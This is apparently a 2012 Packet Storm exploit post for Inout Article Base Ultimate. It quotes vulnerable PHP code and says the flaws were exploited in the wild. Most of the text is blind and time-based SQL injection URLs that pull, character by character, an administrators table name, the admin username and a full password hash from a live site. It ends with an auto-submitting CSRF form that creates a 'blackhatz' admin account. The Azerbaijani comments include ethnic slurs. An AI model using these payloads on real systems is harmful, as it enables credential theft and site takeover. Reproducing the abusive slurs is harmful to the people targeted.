exploit the possibilities

Inout Article Base Ultimate SQL Injection / CSRF

Inout Article Base Ultimate SQL Injection / CSRF
Posted Oct 25, 2012
Authored by Akastep

Inout Article Base Ultimate versions prior to 2 suffer from cross site request forgery and remote blind SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
MD5 | 705d90715fa0f67219e13d03f9a999ee

Inout Article Base Ultimate SQL Injection / CSRF

Change Mirror Download

==============================================================================
Vulnerable Software: Inout Article Base Ultimate Version: < 2
Vulnerabilities: Blind SQLi && CROSS Site Request Forgery.
Discovered and Exploited in Wild
Vendor: inoutscripts.com
==============================================================================


About software version:
==============================================================================
I can't say what exact version affected but:(it is probably version < 2.0))
Here is what it's Upgrade.html says:
*Inout ArticleBase-Upgradtion to version 2.0*
If you are currently using old version of Inout ArticleBase and want to upgrade
to version 2.0 of Inout ArticleBase, please follow the instructions given below.
etc...
==============================================================================


=========================VULNERABLE CODE=======================================
//controller/ViewController.class.php

function getarticlecount($cid)
{
$cat= $this->getSubcategoryList($cid);

$this->loadLibrary("settings");
$set=new settings("nesote_inoutarticle_settings");
$set->loadValues();
$show_articles=$set->getValue("show_ articles_selected_language");
$lang_id=$this->getlang_id();
if($show_articles==1)
$languagecondition="and lang_id='".$lang_id."'";
else
$languagecondition="";

//echo $parent;
$db= new NesoteDALController();
if($cat!=null)
{
$len=strlen($cat);
$cat=substr($cat,0,($len-2));
}
else
$cat="'".$cid."'";
$total=$db->total(array("c"=>"nesote_inoutarticle_categories","a"=>"nesote_inoutarticle_articles"),"a.cid=c.id and a.cid in($cat) and a.status=? and c.status=? $languagecondition",array(1,1));
// echo $db->getQuery();
return $total;

}

===============================================================================

================================EXPLOITATION===================================

On TRUE returns: normal page to articles.
On FALSE returns: No article posted yet.


//TRUE verir bu.
www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)='1',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8

http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(count(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(length(table_name)!='0',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='i',sleep(10),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8


http://www.xxxxxxxxxxxx.tld/view/categories/1') or (select if(substr(table_name,1,1)='e',benchmark(10000000,md5(1)),0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 0)-- and 8=('8


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if('a'='ab',1,0))-- and 8=('8

TRUE DA xeberlerli sehife


false-de

No article posted yet.

AND logical ile.



password adli column burda olmalidir:


//TRUE

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


1-CI SIMVOL c
2-ci simvol: l

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,2,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



3-de: a


www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,3,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

4-de s


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,4,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

5-de: s

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,5,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


6-da i


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,6,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


7-de f

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,7,1)='f',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


8-de i

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,8,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


9-da e

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,9,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



10-da d

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,10,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

11-de s


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,11,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

12-de _

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,12,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

hal hazirda classifieds_


13-de: n


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,13,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8

classifieds_n



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(table_name)='46',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


46 simvol! Burda deyiblere anovu sikim ermeni!!!!!!!!!!!


Sikdirdi bu table baxaq basqasina.



======================================================

24-e qeder cixmir

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(table_name)!='0',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1 offset 25)-- and 8=('8


14-cu simvol: e



15-ci simvol: s



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,15,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8





16-ci simvol: o


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,16,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8






17-ci simvol: t



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,17,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8




18-ci simvol: e


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,18,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8





davamini gedek gorek ne verir.


19-da _ olmalidir yoxlayaq yene de.



duzdur


19-cu simvol: _


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,19,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



20-ci simvol: i


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,20,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


21-ci simvol: n

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,21,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


22-ci simvol: o


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,22,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



23-cu simvol: u


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,23,1)='u',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8




24-cu simvol: t


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,24,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8





25-ci simvol: a

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,25,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8




26-ci simvol: r


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,26,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



27-ci simvol: t



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,27,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



28-ci simvol: i


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,28,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8




29-cu simvol: c


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,29,1)='c',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



30-cu simvol: l


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,30,1)='l',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



31-ci simvol: e


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,31,1)='e',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



32-ci simvol: _


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,32,1)='_',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


33-cu simvol: a

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,33,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


34-cu simvol: d


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,34,1)='d',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


deyesen adminlikdir burda duz cixiriq ustune artiq.


35-ci simvol: m


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,35,1)='m',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


36-ci simvol: i



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,36,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



37-ci simvol: n



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,37,1)='n',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8




38-ci simvol: i


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,38,1)='i',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



39-cu simvol: s



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,39,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



40-ci simvol: t


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,40,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



41-ci simvol: r



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,41,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



42-ci simvol: a


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,42,1)='a',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



43-cu simvol: t


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,43,1)='t',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



44-cu simvol: o


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,44,1)='o',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



45-ci simvol: r


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,45,1)='r',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8



46-ci simvol: s

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,1)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


Bu axirinci simvol idi cunki TRUE qaytardi yoxlanis:


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,46,100)='s',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8


table_name-i yigaq.






mysql> select length('classifieds_nesote_inoutarticle_administrators') \g
----------------------------------------------------------
| length('classifieds_nesote_inoutarticle_administrators') |
----------------------------------------------------------
| 46 |
----------------------------------------------------------
1 row in set (0.00 sec)

mysql>



//TRUE


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(table_name,1,100)='classifieds_nesote_inoutarticle_administrators',1,0) from information_schema.columns where column_name='password' and table_schema=database() limit 1)-- and 8=('8






burda bizde username
id
password columnlari var.


Oxay bavan qurban 1 username var burda 100% adminlikdir)))))))



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(count(username)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC)-- and 8=('8




//TRUE


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(username,1,10)='admin',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8




menasiz idi amma yene de 100 olcek bir bicek

//TRUE
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(username)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8




MD5-dir pass:



http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(length(password)='32',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8



Cekek getsin naxuy:

========================================================
qancigin parolunun md5-i nin 1ci simvolu:
1-ci simvol: f

//TRUE
http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,1,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================

2-ci simvol: 8

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,2,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

3-cu simvol: c


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,3,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

4-cu simvol: b

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,4,1)='b',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================

5-ci simvol: e


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,5,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================

6-ci simvol: 6


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,6,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
7-ci simvol: 3


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,7,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
8-ci simvol: 7


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,8,1)='7',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
9-cu simvol: 1


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,9,1)='1',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================

10-cu simvol: 6


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,10,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

11-ci simvol: 4


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,11,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

12-ci simvol: 2

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,12,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
13-cu simvol: 5


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,13,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
14-cu simvol: 4


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,14,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
15-ci simvol: 4

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,15,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================

16-ci simvol: 6


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,16,1)='6',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================

17-ci simvol: 2

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,17,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
18-ci simvol: 9

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,18,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
19-ci simvol: 5


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,19,1)='5',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

20-ci simvol: 2

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,20,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

21-ci simvol: f


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,21,1)='f',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8
========================================================

22-ci simvol: d

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,22,1)='d',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8



========================================================
23-cu simvol: a

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,23,1)='a',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

24-cu simvol: 4

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,24,1)='4',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

25-ci simvol: c


http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,25,1)='c',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================

26-ci simvol: e

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,26,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8



========================================================

27-ci simvol: 2

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,27,1)='2',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================
28-ci simvol: 3

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,28,1)='3',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8



========================================================

29-cu simvol: 9

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,29,1)='9',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
30-cu simvol: 8

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,30,1)='8',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
31-ci simvol: e

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,31,1)='e',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8

========================================================
32-ci simvol: 0

http://www.xxxxxxxxxxxx.tld/view/categories/1') and (select if(substr(password,32,1)='0',1,0) from classifieds_nesote_inoutarticle_administrators order by id ASC limit 1)-- and 8=('8


========================================================






CSRF add admin:

username: blackhatz
password: blackhatz
email: blackhatz@blackhatz.tld

<body onload="javascript:document.forms[0].submit()">
<form name="addsubadmin" id="addsubadmin" enctype="multipart/form-data" method="POST" action="http://www.xxxxxxxxxxxx.tld/admin/permissions/addsubadminprocess">
<input name="username" type="text" id="username" value="blackhatz">
<input name="name" type="text" id="name" value="blackhatz">
<input name="password" type="password" id="password" value="blackhatz">
<input name="cpassword" type="password" id="cpassword" value="blackhatz">
<input name="email" type="text" id="email" value="blackhatz@blackhatz.tld">
<select name="gid" id="gid" >
<option value="1"></option>
<option value="1">admins selected="selected"</option>
</select>
<input name="pid" type="hidden" id="pid" value="{$pid}">
<!-- <input type="submit" name="Submit" value="Submit">-->
</form>

================ THE END =====================






================================================

SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    16 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close